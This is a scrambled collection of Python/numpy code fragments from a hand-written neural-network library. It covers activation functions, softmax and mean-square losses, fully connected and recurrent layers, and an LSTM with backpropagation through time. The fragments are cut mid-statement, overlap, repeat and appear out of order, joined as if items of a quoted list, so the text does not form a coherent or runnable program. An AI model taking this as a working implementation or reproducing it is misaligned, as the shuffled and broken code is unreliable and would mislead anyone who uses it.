class FCr: '''", "time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t", "inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell", "= None weights = None previous = None activation = None def __init__(self,", "def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] +", "np.tanh(input) def d(self, input): return 1 - input * input class sigmoid: def", "def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache", "1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0", "dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] #", "np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden'])", "self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :,", "= activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs':", "dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :,", "dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]])", "= 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_", "previous_cell = cells[t - 1] if t > 0 else c0 inputs[t, :,", "enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i))", "return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps,", "for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected", "= dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if", "self.shape[1]:] cells_act[t] = 
np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] =", "return out def init(self): for l in self.layers: l.init() def reset(self): for l", "def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it", "non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_ =", "cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out,", "= cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct = np.zeros(activations.shape)", "- cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] *", "dh0} class LSTM: ''' Long Short Term Memory layer Paper can be found", "train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out = [None]", "inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0,", "dW, dIn, None class FCr: ''' Fully Connected recursive layer ''' shape =", "1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None def", "(dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely", "dH = dOut.copy() if dCache is not None: dH[-1] += np.copy(dH['dHidden']) for t", "path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully", "'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs", "None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias", "of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t]", "weights = None 
previous = None cell = None def __init__(self, shape): self.shape", "3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2)", "self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs =", "-> * stands for the dot product Now, we have (x_i) matrix and", "/ np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0:", "axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax:", "reset(self): for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs,", "{'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs =", "np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return", "with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs,", "None class FCr: ''' Fully Connected recursive layer ''' shape = None weights", "dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW", "* self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]]", "Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is", "path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in", "= np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None:", "as np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return", "= input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws =", "1 class softmax_loss: ''' To be used in combination with sofmax ''' def", "dH[t] C_previous, dC_previous = (cell[t - 1], 
dCell[t - 1]) if t >", "0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] =", "input_2) / np.size(input_1) class softmax: ''' Only to be used as the last", "pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self,", "* stands for the dot product Now, we have (x_i) matrix and (dY_i)", "np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0", "= self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out)", "np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ =", "activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *=", ":, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ])", "* self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs, {'inputs': inputs, 'outputs': outputs, 'activations':", "self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t,", "and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is", "dCell[t - 1]) if t > 0 else (c0, dc0) # dforget dAct[t,", "else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous *", "= [] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self,", "products of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T,", "input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_,", "dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] 
if t >", "numpy as np class tanh: def __call__(self, input): return np.tanh(input) def d(self, input):", "self.shape = shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] +", "time_steps): previous = outputs[t - 1] if t > 0 else h0 inputs[t,", "time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 *", "return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1", "= np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0):", "if t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 *", "is to be a rank 3 tensor ''' out = input for l", "inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch,", "Long Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape", "time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations =", "def reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous)", ":, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] =", "train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers = None", "None weights = None previous = None activation = None def __init__(self, shape,", "inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1]", "layer ''' shape = None weights = None previous = None activation =", "self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]]", "self.shape[1]:] ** 2) ''' the following line sums the gradients over the entire", "scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = 
self.eval_for_back_prop(input_tensor) return out", "* dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1]) if t", "previous call to softmax_loss function ''' return 1 class softmax_loss: ''' To be", ":, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t])", "= input for l in self.layers: out = l(out) return out def init(self):", "dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t])", "input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps,", "enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer ''' shape =", "* self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 * self.shape[1]:3 *", "= self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut,", "'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None}", "softmax_loss function ''' return 1 class softmax_loss: ''' To be used in combination", "reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the", "'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in", "self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t] *", "line sums the gradients over the entire batch proof: Let x be a", "* dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0 - activations[t,", "0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous", "h0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :,", "* dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t]", "1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] =", "def d(self, input): 
return 1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1", "/ (1 + np.exp(-input)) def d(self, input): return input * (1 - input)", "shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1): self.weights =", "input * input class sigmoid: def __call__(self, input): return 1 / (1 +", "None self.cell = None def reset(self): self.previous = None self.cell = None def", "def __call__(self, input): return input def d(self, input): return 1 class mean_square: def", "be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous =", "2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t", "def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations", "1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0", "return tmp_ class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers", "activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :,", "FC: ''' Fully Connected layer ''' shape = None weights = None activation", "and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot", "outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self,", "= out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)):", "dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] +=", "cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache,", "1]) if t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2", "1] if t > 0 else c0 inputs[t, :, -1] = 1 inputs[t,", "outputs.shape dAct = np.zeros(activations.shape) dW = 
np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape)", "= shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1,", "__call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous =", "to softmax_loss function ''' return 1 class softmax_loss: ''' To be used in", "if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps):", "used in combination with sofmax ''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on])", "0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0,", "1, as the derivative is covered by a previous call to softmax_loss function", "for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class", "= None previous = None cell = None def __init__(self, shape): self.shape =", "''' To be used in combination with sofmax ''' def __call__(self, input, train_on):", "precisely the matrix product dW=x.T*dY where x holds x_i as its rows and", "dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous", "np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH =", "'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs']", "self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0,", "np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy()", "self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :, 0:3", "out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0':", 
"forget_bias_init self.previous = None self.cell = None def reset(self): self.previous = None self.cell", "1 / (1 + np.exp(-input)) def d(self, input): return input * (1 -", "= None previous = None activation = None def __init__(self, shape, activation=identity()): self.shape", "inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t]", "self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations =", "np.size(input_1) class softmax: ''' Only to be used as the last non-recursive layer", "np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps,", "= [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache =", "= 0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache =", "= dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the", "d(self, probs, train_on=None): ''' it computes the softmax loss derivative for optimality '''", "t in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line", "+= (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 *", "input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return", "> 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] =", "np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous", "dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds x_i as", "'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn':", "np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache is not", "be a single input and dY a single gradient Than 
dW=np.outer(x,dY)=x.T*dY -> *", "self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def", "self.weights[-1, :] = 0 def reset(self): self.previous = None def __call__(self, input_tensor): out,", "def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt(", "Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product", "desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY", "return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def", ":, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2 *", "''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers", "i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy'", "* self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) * activations[t, :,", "(input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be used as", "batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1])", "if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l] =", "columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t]", "single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we", "[None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0", "(1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]]", "as the last non-recursive layer ''' def __call__(self, input): shifted_ = input -", "in cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps,", "{ 'c0': 
cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn'] if 'hn'", "''' it returns 1, as the derivative is covered by a previous call", "next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for", "self.shape[1]]) dH = next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1]", "shape = None weights = None previous = None activation = None def", "Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights", "return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None):", "recursive layer ''' shape = None weights = None previous = None activation", "cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if", "the entire batch proof: Let x be a single input and dY a", "the dot product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our", "rank 3 tensor ''' out = input for l in self.layers: out =", "- input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2)", "0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0}", "dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1]", "> 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden':", "'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None,", "outputs[t] = activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * cells_act[t] return outputs,", "in reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums", "/ (1. 
+ np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] =", "range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t, :, -1] =", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if", "activation = None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape", "h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0):", "be used as the last non-recursive layer ''' def __call__(self, input): shifted_ =", "= input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :,", "self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous =", ":, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] **", "dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for", ":, 0:self.shape[0]] dh = dH[t - 1] if t > 0 else dh0", "2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) /", "def eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch,", "not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)):", "activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t]", "return dW, dIn, None class FCr: ''' Fully Connected recursive layer ''' shape", "dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh", "''' def __call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): '''", "= np.copy(cache['hn']) return out def 
eval_for_back_prop(self, input_tensor, h0=None): time_steps, batch, in_ = input_tensor.shape", "__call__(self, input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes", "loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t],", "= None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell,", "over the entire batch proof: Let x be a single input and dY", "outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps,", "(x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n", "* activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t,", ":, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t,", "0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive layer '''", "scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] +", ":, 0:3 * self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3", "= inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs,", "self.shape[1]) self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 *", "self.previous = None self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor,", "3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell +", "out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l]", "__call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, 
batch,", "and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] =", "(cell[t - 1], dCell[t - 1]) if t > 0 else (c0, dc0)", "* self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3", "* activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0", "activations = np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 =", "last non-recursive layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_", "''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]]", "mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1]", "self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to be a", "input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the", "np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers = [] num_of_layers", "__call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor, h0=self.previous) self.previous = np.copy(cache['hn']) return out def", "return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to be used", "cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn']", "'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs =", "self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None, mask_start=0): time_steps, batch,", "class FCr: ''' Fully Connected recursive layer ''' shape = None weights =", "def init(self): for l in self.layers: l.init() def reset(self): for l in 
self.layers:", "None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self,", "dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] *", "and dY holds dY_i as its rows In other words, a product of", "call to softmax_loss function ''' return 1 class softmax_loss: ''' To be used", "Only to be used as the last non-recursive layer ''' def __call__(self, input):", "for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :, :] inputs[t,", "3 tensor ''' out = input for l in self.layers: out = l(out)", "h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous", "is not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0'])", "+= dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long", "class tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1 -", "a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now,", "time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights)", "l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache =", "not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif", "* self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3", "np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps):", "/ 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 - input_2) / np.size(input_1)", "np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch,", "]) 
activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3", "input) class identity: def __call__(self, input): return input def d(self, input): return 1", "3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] =", "cache0 is not None and cache0[l] is not None: if cache0[l]['c0'] is not", "we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n", "loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in", "input, c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch,", ":, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term", "input def d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2): return", "self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire batch proof:", "gradients over the entire batch proof: Let x be a single input and", "self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch,", "return 1 / (1 + np.exp(-input)) def d(self, input): return input * (1", 